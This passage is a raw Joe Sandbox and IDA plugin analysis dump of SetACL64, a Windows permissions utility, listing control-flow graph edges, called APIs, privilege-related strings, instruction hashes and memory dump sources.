7ff69705442b-7ff697054430 call 7ff6970788fc 1640->1661 1649 7ff697054210-7ff697054220 1644->1649 1651 7ff697054296-7ff697054299 1645->1651 1652 7ff697054314-7ff697054320 1645->1652 1655 7ff697054239-7ff697054266 1649->1655 1656 7ff697054222-7ff697054233 call 7ff69706e4b0 1649->1656 1660 7ff6970542a0-7ff6970542b4 1651->1660 1657 7ff697054322-7ff69705432c call 7ff69706e4b0 1652->1657 1658 7ff697054335-7ff697054341 1652->1658 1655->1645 1655->1649 1656->1655 1685 7ff697054356-7ff69705435b 1656->1685 1676 7ff697054331-7ff697054333 1657->1676 1665 7ff69705435d-7ff697054367 call 7ff697054810 1658->1665 1666 7ff697054343-7ff697054354 call 7ff69706e4b0 1658->1666 1668 7ff6970542cd-7ff6970542d2 1660->1668 1669 7ff6970542b6-7ff6970542c7 call 7ff69706e4b0 1660->1669 1688 7ff697054369-7ff697054372 1665->1688 1689 7ff6970543b1-7ff6970543dc call 7ff697072180 1665->1689 1666->1665 1666->1685 1671 7ff6970542ea-7ff697054312 1668->1671 1672 7ff6970542d4-7ff6970542e8 call 7ff69706e4b0 1668->1672 1669->1668 1669->1685 1671->1652 1671->1660 1672->1671 1672->1685 1676->1658 1676->1685 1685->1689 1694 7ff697054374-7ff697054396 call 7ff69705a350 1688->1694 1695 7ff69705439e-7ff6970543a1 1688->1695 1691->1633 1693 7ff6970541a1-7ff6970541b8 1691->1693 1696 7ff697054177-7ff69705418a 1692->1696 1697 7ff697054190-7ff697054195 call 7ff6970721a0 1692->1697 1699 7ff6970541ba-7ff6970541cd 1693->1699 1700 7ff6970541d3 call 7ff6970721a0 1693->1700 1694->1689 1710 7ff697054398 1694->1710 1702 7ff6970543a3-7ff6970543aa call 7ff69706b2b0 1695->1702 1703 7ff6970543af 1695->1703 1696->1661 1696->1697 1697->1691 1699->1587 1699->1700 1700->1633 1702->1703 1703->1689 1710->1695
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: _invalid_parameter_noinfo_noreturn$ErrorLastProcess$CurrentOpenToken
                              • String ID: Prepare$Privilege 'Back up files and directories' could not be enabled. SetACL's powers are restricted. Better run SetACL with admin right$Privilege 'Restore files and directories' could not be enabled. SetACL's powers are restricted. Better run SetACL with admin right$Privilege 'Take ownership of files or other objects' could not be enabled. SetACL's powers are restricted. Better run SetACL with $SeRestorePrivilege$SeTakeOwnershipPrivilege
                              • API String ID: 6815931-1541018277
                              • Opcode ID: ecfdb7b02d6f6838b6ac89f80637403c6b442040516c981f8ff8b7f4b81811b7
                              • Instruction ID: 95f9c33fa1476ffee1c2af5abca079a32bb9f009a5e54d17a0987b1e1558cc88
                              • Opcode Fuzzy Hash: ecfdb7b02d6f6838b6ac89f80637403c6b442040516c981f8ff8b7f4b81811b7
                              • Instruction Fuzzy Hash: AB2284B2B1978281EE249B69E4443ADA361FB857E4F505275EA5DC3BE9DF7CE080C700

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1711 7ff697052dcb-7ff697052dd3 1712 7ff69705346c-7ff69705347c call 7ff697074c18 1711->1712 1713 7ff697052dd9-7ff697052de1 1711->1713 1716 7ff697053481-7ff697053495 call 7ff697074c18 1712->1716 1715 7ff697052de7-7ff697052deb 1713->1715 1713->1716 1717 7ff697052ded-7ff697052dfd call 7ff697057b10 1715->1717 1718 7ff697052e03-7ff697052e0e 1715->1718 1721 7ff69705349a-7ff6970534aa call 7ff697074c18 1716->1721 1717->1718 1717->1721 1722 7ff697052e1a-7ff697052e32 1718->1722 1723 7ff697052e10-7ff697052e14 1718->1723 1730 7ff6970534af-7ff6970534c4 call 7ff697074c18 1721->1730 1728 7ff697052e34-7ff697052e4d call 7ff697039520 call 7ff6970596d0 1722->1728 1729 7ff697052e4f-7ff697052e52 1722->1729 1726 7ff697052e16-7ff697052e18 1723->1726 1727 7ff697052e90-7ff697052e9d 1723->1727 1726->1722 1726->1727 1732 7ff697052ea3-7ff697052ea5 1727->1732 1733 7ff6970531e4 1727->1733 1768 7ff697052e84-7ff697052e8a 1728->1768 1734 7ff697052e54-7ff697052e66 call 7ff697039520 call 7ff69705b710 1729->1734 1735 7ff697052e6f-7ff697052e82 call 7ff697039520 call 7ff69705bc40 1729->1735 1754 7ff6970534c5-7ff6970534da call 7ff697074c18 1730->1754 1732->1733 1740 7ff697052eab-7ff697052ef7 1732->1740 1738 7ff6970531ea-7ff6970531ec 1733->1738 1760 7ff697052e6b-7ff697052e6d 1734->1760 1735->1768 1744 7ff6970531f2-7ff6970531f4 1738->1744 1745 7ff69705331f-7ff6970533b7 call 7ff697043f80 * 2 call 7ff69704d260 1738->1745 1747 7ff697052f57-7ff697052f7a 1740->1747 1748 7ff697052ef9-7ff697052f4f call 7ff6970641a0 call 7ff697065f60 1740->1748 1744->1745 1755 7ff6970531fa-7ff697053207 1744->1755 1818 7ff6970533b9-7ff6970533d3 1745->1818 1819 7ff6970533f4-7ff697053400 1745->1819 1751 7ff697052f7c 1747->1751 1752 7ff697052f97-7ff697052fa9 1747->1752 1748->1747 1761 7ff697052f80-7ff697052f91 1751->1761 1763 7ff697052fab-7ff697052fb2 1752->1763 1764 7ff697052fb9-7ff697052fc0 1752->1764 1779 7ff6970534db-7ff6970534e0 call 7ff6970788fc 1754->1779 1766 7ff697053209-7ff69705320e call 7ff69708de6c 1755->1766 1767 7ff697053211-7ff69705323a call 7ff697039520 1755->1767 1760->1768 1786 7ff697052f93 1761->1786 1763->1764 1771 7ff697052fc2-7ff697052fc9 1764->1771 1772 7ff697052fd0-7ff697052fdf 1764->1772 1766->1767 1791 7ff69705323c-7ff697053256 1767->1791 1792 7ff697053276-7ff697053278 1767->1792 1768->1727 1768->1730 1771->1772 1780 7ff697053054-7ff6970530f9 call 7ff697043f80 * 2 call 7ff69704d260 1772->1780 1781 7ff697052fe1-7ff697052ff1 1772->1781 1812 7ff6970534e1-7ff6970534e6 call 7ff6970788fc 1779->1812 1859 7ff6970530fb-7ff697053115 1780->1859 1860 7ff697053136-7ff697053142 1780->1860 1788 7ff697052ff3-7ff69705300c call 7ff697039520 call 7ff6970596d0 1781->1788 1789 7ff69705300e-7ff697053011 1781->1789 1786->1752 1841 7ff697053043-7ff697053049 1788->1841 1796 7ff697053013-7ff69705302c call 7ff697039520 call 7ff69705b710 1789->1796 1797 7ff69705302e-7ff697053041 call 7ff697039520 call 7ff69705bc40 1789->1797 1794 7ff697053258-7ff69705326b 1791->1794 1795 7ff697053271 call 7ff6970721a0 1791->1795 1798 7ff69705327a-7ff697053289 call 7ff69706e1c0 1792->1798 1799 7ff697053299-7ff6970532b1 1792->1799 1794->1795 1804 7ff6970534e7-7ff6970534ec call 7ff6970788fc 1794->1804 1795->1792 1796->1841 1797->1841 1798->1799 1832 7ff69705328b-7ff697053294 1798->1832 1810 7ff6970532b3-7ff6970532cc call 7ff697039520 call 7ff6970596d0 1799->1810 1811 7ff6970532ce-7ff6970532d1 1799->1811 1846 7ff6970534ed-7ff697053502 call 7ff697074c18 1804->1846 1875 7ff697053303-7ff697053309 1810->1875 1823 7ff6970532d3-7ff6970532ec call 7ff697039520 call 7ff69705b710 1811->1823 1824 7ff6970532ee-7ff697053301 call 7ff697039520 call 7ff69705e530 1811->1824 1812->1804 1833 7ff6970533d5-7ff6970533e8 1818->1833 1834 7ff6970533ee-7ff6970533f3 call 7ff6970721a0 1818->1834 1837 7ff69705343d-7ff69705346b call 7ff697072180 1819->1837 1838 7ff697053402-7ff69705341c 1819->1838 1823->1875 1824->1875 1832->1846 1833->1834 1848 7ff697053503-7ff697053508 call 7ff6970788fc 1833->1848 1834->1819 1851 7ff697053437-7ff69705343c call 7ff6970721a0 1838->1851 1852 7ff69705341e-7ff697053431 1838->1852 1841->1754 1857 7ff69705304f 1841->1857 1846->1848 1864 7ff697053509-7ff6970535d7 call 7ff6970788fc call 7ff697043f80 * 2 call 7ff69704d260 1848->1864 1851->1837 1852->1851 1852->1864 1868 7ff69705317e-7ff6970531ae 1857->1868 1870 7ff697053117-7ff69705312a 1859->1870 1871 7ff697053130-7ff697053135 call 7ff6970721a0 1859->1871 1860->1868 1874 7ff697053144-7ff69705315e 1860->1874 1898 7ff6970535d9-7ff6970535f0 1864->1898 1899 7ff697053611-7ff6970536e8 1864->1899 1876 7ff6970531c8-7ff6970531e2 call 7ff6970640e0 1868->1876 1877 7ff6970531b0-7ff6970531c3 call 7ff697066010 1868->1877 1870->1779 1870->1871 1871->1860 1882 7ff697053179 call 7ff6970721a0 1874->1882 1883 7ff697053160-7ff697053173 1874->1883 1878 7ff69705330b-7ff697053310 call 7ff69708de6c 1875->1878 1879 7ff697053313-7ff697053319 1875->1879 1876->1738 1877->1876 1878->1879 1879->1745 1879->1846 1882->1868 1883->1812 1883->1882 1900 7ff69705360b-7ff697053610 call 7ff6970721a0 1898->1900 1901 7ff6970535f2-7ff697053605 1898->1901 1903 7ff6970536ea-7ff697053701 1899->1903 1904 7ff697053721-7ff6970543dc call 7ff697072180 1899->1904 1900->1899 1901->1900 1905 7ff6970543e3-7ff697054430 call 7ff6970788fc * 13 1901->1905 1907 7ff69705371c call 7ff6970721a0 1903->1907 1908 7ff697053703-7ff697053716 1903->1908 1907->1904 1908->1907 1912 7ff6970543dd-7ff6970543e2 call 7ff6970788fc 1908->1912 1912->1905
                              APIs
                              • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6970534DB
                              • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6970534E1
                              • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6970534E7
                              • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697053503
                              • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697053509
                                • Part of subcall function 00007FF69705B710: RegEnumKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000001A1), ref: 00007FF69705B812
                                • Part of subcall function 00007FF697039520: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697039606
                                • Part of subcall function 00007FF697039520: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF69703960C
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskEnum
                              • String ID: SetACL finished successfully.$/$Action 'reset children' was used without specifying whether to reset the DACL, SACL, or both. Nothing was reset.$Object path and/or object type not specified.$Prepare$Run$read
                              • API String ID: 1222371136-710240214
                              • Opcode ID: 6fd56c362ca3c0bd5d5ac0762c920353aa005472101274b7ea8be5c822556958
                              • Instruction ID: 23db0b28454b5eb586edfa0982a5cf2458d766493ac9338fdb3a45c4e31c0d95
                              • Opcode Fuzzy Hash: 6fd56c362ca3c0bd5d5ac0762c920353aa005472101274b7ea8be5c822556958
                              • Instruction Fuzzy Hash: 4D32BFB2B1978282EA74DB26E4853AEA361FB457D4F404572EA9CC3AD9DF7CE144C700
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: _invalid_parameter_noinfo_noreturn$Info$CloseErrorLastProcessSecurityShare$BufferCreateCurrentFileFreeHandleNamedOpenToken
                              • String ID: SeSecurityPrivilege
                              • API String ID: 4200377542-2333288578
                              • Opcode ID: 6e52a741af2d2e6aca60200d1f76bf38ab8845e3248805846f20d0d5f9e7f980
                              • Instruction ID: 372bdca681f2688d1aa754e6088c37aff714f9b90cabd18d8b2fd07916b4c490
                              • Opcode Fuzzy Hash: 6e52a741af2d2e6aca60200d1f76bf38ab8845e3248805846f20d0d5f9e7f980
                              • Instruction Fuzzy Hash: 4A427FA2A19B4285EB208F25D4547AD33A1FB847E8F506275EA5DC7AD9DF38E680C340

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 3201 7ff69704cd0a-7ff69704cd24 call 7ff69704d0a0 call 7ff697044fc0 3206 7ff69704cd26-7ff69704cd2e 3201->3206 3207 7ff69704cd94-7ff69704cd9c 3201->3207 3208 7ff69704cd66-7ff69704cd91 3206->3208 3209 7ff69704cd30-7ff69704cd46 3206->3209 3210 7ff69704cdd4-7ff69704cdd9 3207->3210 3211 7ff69704cd9e-7ff69704cdb4 3207->3211 3208->3207 3212 7ff69704cd48-7ff69704cd5b 3209->3212 3213 7ff69704cd61 call 7ff6970721a0 3209->3213 3216 7ff69704cddb-7ff69704cdf1 call 7ff697043f80 3210->3216 3217 7ff69704cdf6-7ff69704ce19 call 7ff697039520 call 7ff69706c0b0 3210->3217 3214 7ff69704cdb6-7ff69704cdc9 3211->3214 3215 7ff69704cdcf call 7ff6970721a0 3211->3215 3212->3213 3219 7ff69704d084-7ff69704d089 call 7ff6970788fc 3212->3219 3213->3208 3214->3215 3214->3219 3215->3210 3226 7ff69704cf9c-7ff69704cfd4 RegisterEventSourceW call 7ff69707e62c 3216->3226 3233 7ff69704ce1b-7ff69704ce23 3217->3233 3234 7ff69704ce89-7ff69704ce91 3217->3234 3231 7ff69704d08a-7ff69704d08f call 7ff6970788fc 3219->3231 3232 7ff69704cfd9-7ff69704cfe3 3226->3232 3247 7ff69704d090-7ff69704d095 call 7ff6970788fc 3231->3247 3236 7ff69704cff9-7ff69704d004 3232->3236 3237 7ff69704cfe5-7ff69704cff7 call 7ff69707e1f8 call 7ff69704c3a0 3232->3237 3238 7ff69704ce5b-7ff69704ce86 3233->3238 3239 7ff69704ce25-7ff69704ce3b 3233->3239 3241 7ff69704cec9-7ff69704ceec call 7ff697039520 call 7ff69706bf70 3234->3241 3242 7ff69704ce93-7ff69704cea9 3234->3242 3248 7ff69704d006-7ff69704d00a 3236->3248 3237->3248 3238->3234 3245 7ff69704ce3d-7ff69704ce50 3239->3245 3246 7ff69704ce56 call 7ff6970721a0 3239->3246 3268 7ff69704cf5c-7ff69704cf64 3241->3268 3269 7ff69704ceee-7ff69704cef6 3241->3269 3249 7ff69704ceab-7ff69704cebe 3242->3249 3250 7ff69704cec4 call 7ff6970721a0 3242->3250 3245->3231 3245->3246 3246->3238 3255 7ff69704d00c-7ff69704d022 3248->3255 3256 7ff69704d03e-7ff69704d07d LeaveCriticalSection call 7ff697072180 3248->3256 3249->3231 3249->3250 3250->3241 3261 7ff69704d039 call 7ff6970721a0 3255->3261 3262 7ff69704d024-7ff69704d037 3255->3262 3261->3256 3262->3261 3268->3226 3272 7ff69704cf66-7ff69704cf7c 3268->3272 3270 7ff69704cef8-7ff69704cf0e 3269->3270 3271 7ff69704cf2e-7ff69704cf59 3269->3271 3273 7ff69704cf29 call 7ff6970721a0 3270->3273 3274 7ff69704cf10-7ff69704cf23 3270->3274 3271->3268 3275 7ff69704cf97 call 7ff6970721a0 3272->3275 3276 7ff69704cf7e-7ff69704cf91 3272->3276 3273->3271 3274->3247 3274->3273 3275->3226 3276->3247 3276->3275
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: _invalid_parameter_noinfo_noreturn$CriticalSection$EnterEventFileLeaveModuleNameRegisterSource
                              • String ID: DefaultEventSource
                              • API String ID: 352910984-1672983561
                              • Opcode ID: 9ab4e8bb403d8240f21ffea30b4f19ad447ea429c625c95da4614829f2c2d001
                              • Instruction ID: 13412c2003b6ab8c2abb4f54ff4c93efc0a31621403ec5d16301afe5cf9eaaa5
                              • Opcode Fuzzy Hash: 9ab4e8bb403d8240f21ffea30b4f19ad447ea429c625c95da4614829f2c2d001
                              • Instruction Fuzzy Hash: E0A15DA2B15A8195EF108F38D4453AD2361EF647ECF408675E76C87ADAEF78E180D340

                              Control-flow Graph

                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: CriticalSection$EnterLeave$CloseDeregisterEventHandleSource
                              • String ID:
                              • API String ID: 1038480651-0
                              • Opcode ID: 7186af4088bc47e5858a979c3040af2f97af1d69e41cea5f9ceaa15bf5e240b6
                              • Instruction ID: d14c80ef028b6e54d9edb29c7b5abd81ba6ff36180df642745c21ecc22e30091
                              • Opcode Fuzzy Hash: 7186af4088bc47e5858a979c3040af2f97af1d69e41cea5f9ceaa15bf5e240b6
                              • Instruction Fuzzy Hash: 00010CA1A0D942C9FAB49B56BCA433463A5FF99FD1F4841B1C94FC2264DF3CB5458200

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 3379 7ff69705b710-7ff69705b777 call 7ff697039520 call 7ff69705bc40 3382 7ff69705b779-7ff69705b77d 3379->3382 3383 7ff69705b783-7ff69705b78c 3382->3383 3384 7ff69705bba4-7ff69705bbb6 call 7ff697039720 3382->3384 3383->3384 3385 7ff69705b792-7ff69705b7b1 call 7ff69705a350 3383->3385 3390 7ff69705bbe9-7ff69705bbf7 3384->3390 3391 7ff69705bbb8-7ff69705bbca 3384->3391 3385->3384 3393 7ff69705b7b7-7ff69705b81b call 7ff6970721d4 call 7ff697074d90 RegEnumKeyExW 3385->3393 3392 7ff69705bbfa-7ff69705bc20 call 7ff697072180 3390->3392 3394 7ff69705bbcc-7ff69705bbdf 3391->3394 3395 7ff69705bbe4 call 7ff6970721a0 3391->3395 3409 7ff69705b81f-7ff69705b826 3393->3409 3396 7ff69705bc27-7ff69705bc2c call 7ff6970788fc 3394->3396 3397 7ff69705bbe1 3394->3397 3395->3390 3406 7ff69705bc2d-7ff69705bc32 call 7ff6970788fc 3396->3406 3397->3395 3416 7ff69705bc33-7ff69705bc38 call 7ff6970788fc 3406->3416 3411 7ff69705b82c-7ff69705b849 3409->3411 3412 7ff69705b920-7ff69705b92a 3409->3412 3413 7ff69705b850-7ff69705b858 3411->3413 3414 7ff69705b9df-7ff69705b9e9 3412->3414 3415 7ff69705b930-7ff69705b933 3412->3415 3413->3413 3417 7ff69705b85a-7ff69705b86a call 7ff697043f80 3413->3417 3420 7ff69705b9eb RegCloseKey 3414->3420 3421 7ff69705b9f1-7ff69705ba02 3414->3421 3418 7ff69705b93c-7ff69705b93f 3415->3418 3419 7ff69705b935-7ff69705b93b RegCloseKey 3415->3419 3429 7ff69705bc39-7ff69705bc3f call 7ff697043e30 3416->3429 3439 7ff69705b86c-7ff69705b88c 3417->3439 3440 7ff69705b88e-7ff69705b8a6 call 7ff697040360 3417->3440 3424 7ff69705b97d-7ff69705b98f call 7ff697039720 3418->3424 3425 7ff69705b941-7ff69705b956 3418->3425 3419->3418 3420->3421 3426 7ff69705bb07-7ff69705bb0a 3421->3426 3427 7ff69705ba08-7ff69705ba2e 3421->3427 3458 7ff69705b9c6-7ff69705b9da 3424->3458 3459 7ff69705b991-7ff69705b9a3 3424->3459 3431 7ff69705b958-7ff69705b96b 3425->3431 3432 7ff69705b974-7ff69705b97c call 7ff6970721a0 3425->3432 3434 7ff69705bb0c-7ff69705bb21 3426->3434 3435 7ff69705bb48-7ff69705bb5a call 7ff697039720 3426->3435 3427->3429 3433 7ff69705ba34-7ff69705ba3c 3427->3433 3441 7ff69705bc21-7ff69705bc26 call 7ff6970788fc 3431->3441 3442 7ff69705b971 3431->3442 3432->3424 3444 7ff69705ba3e 3433->3444 3445 7ff69705ba41-7ff69705ba67 call 7ff69703aa20 3433->3445 3446 7ff69705bb23-7ff69705bb36 3434->3446 3447 7ff69705bb3f-7ff69705bb47 call 7ff6970721a0 3434->3447 3463 7ff69705bb5c-7ff69705bb6e 3435->3463 3464 7ff69705bb91-7ff69705bba2 3435->3464 3452 7ff69705b8aa-7ff69705b8ae 3439->3452 3440->3452 3441->3396 3442->3432 3444->3445 3476 7ff69705ba6c-7ff69705babe call 7ff69703ac70 call 7ff69705b710 3445->3476 3477 7ff69705ba69 3445->3477 3446->3441 3456 7ff69705bb3c 3446->3456 3447->3435 3466 7ff69705b8e6-7ff69705b91b RegEnumKeyExW 3452->3466 3467 7ff69705b8b0-7ff69705b8c6 3452->3467 3456->3447 3458->3392 3461 7ff69705b9a5-7ff69705b9b8 3459->3461 3462 7ff69705b9c1 call 7ff6970721a0 3459->3462 3461->3396 3470 7ff69705b9be 3461->3470 3462->3458 3472 7ff69705bb8c call 7ff6970721a0 3463->3472 3473 7ff69705bb70-7ff69705bb83 3463->3473 3464->3384 3464->3392 3466->3409 3474 7ff69705b8c8-7ff69705b8db 3467->3474 3475 7ff69705b8e1 call 7ff6970721a0 3467->3475 3470->3462 3472->3464 3473->3396 3479 7ff69705bb89 3473->3479 3474->3406 3474->3475 3475->3466 3485 7ff69705baf6-7ff69705baff 3476->3485 3486 7ff69705bac0-7ff69705bad6 3476->3486 3477->3476 3479->3472 3485->3427 3489 7ff69705bb05 3485->3489 3487 7ff69705bad8-7ff69705baeb 3486->3487 3488 7ff69705baf1 call 7ff6970721a0 3486->3488 3487->3416 3487->3488 3488->3485 3489->3426
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: _invalid_parameter_noinfo_noreturn$CloseEnum
                              • String ID:
                              • API String ID: 315095564-0
                              • Opcode ID: 0bbdec918eac68fc3db2708bcef67c58192818c05ae192fec8c5e1946f35cd7f
                              • Instruction ID: 03837182fd33a55395cf5551cc8d8447154cc3c1208de34aac007759a0b0a60b
                              • Opcode Fuzzy Hash: 0bbdec918eac68fc3db2708bcef67c58192818c05ae192fec8c5e1946f35cd7f
                              • Instruction Fuzzy Hash: 99618EB2B18B8185F720DB65E8443AE63B5EB887D8F104135EF8CD7A99EE38E455C344

                              Control-flow Graph

                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: CloseCreateErrorFreeHandleLastLibraryThread_invalid_parameter_noinfo
                              • String ID:
                              • API String ID: 2067211477-0
                              • Opcode ID: 76804c98ee7f117b6a44088b4c4b934afb96eee452b2a54a362fddb3aa974b5e
                              • Instruction ID: c32bd23741ae267a2b38da1a54234994ee20f1a417336a17db28f2467dec2e1e
                              • Opcode Fuzzy Hash: 76804c98ee7f117b6a44088b4c4b934afb96eee452b2a54a362fddb3aa974b5e
                              • Instruction Fuzzy Hash: FB218EB5B0A78682FE24DB65A85007967A0FF94FD0F4884B0EE4DC7B95EE3CE4008B50

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: CompareString$try_get_function
                              • String ID: CompareStringEx
                              • API String ID: 3689094840-2590796910
                              • Opcode ID: 6cc9a304ba6e9625a3989606c7bdae2d4dc860ba4e45f28530a020498054dd0b
                              • Instruction ID: 6c40a98b085e1658977129a5b13ed0975d15b2fe9d63818b2d6eabc4936bfeb4
                              • Opcode Fuzzy Hash: 6cc9a304ba6e9625a3989606c7bdae2d4dc860ba4e45f28530a020498054dd0b
                              • Instruction Fuzzy Hash: EB112472A08B8086D774CB56B4802AAB7A5FBC8BD0F54413AEE8DC3B59DF3CD4408B40

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
